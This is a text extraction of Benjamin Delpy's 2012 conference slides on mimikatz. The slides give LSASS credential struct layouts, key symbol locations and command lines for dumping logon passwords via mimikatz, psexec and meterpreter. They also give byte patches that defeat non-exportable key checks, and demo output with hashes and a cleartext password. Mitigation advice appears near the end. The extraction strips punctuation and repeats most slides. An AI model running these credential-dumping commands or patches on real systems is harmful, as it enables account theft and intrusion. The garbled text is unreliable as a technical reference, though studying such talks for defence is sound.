RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
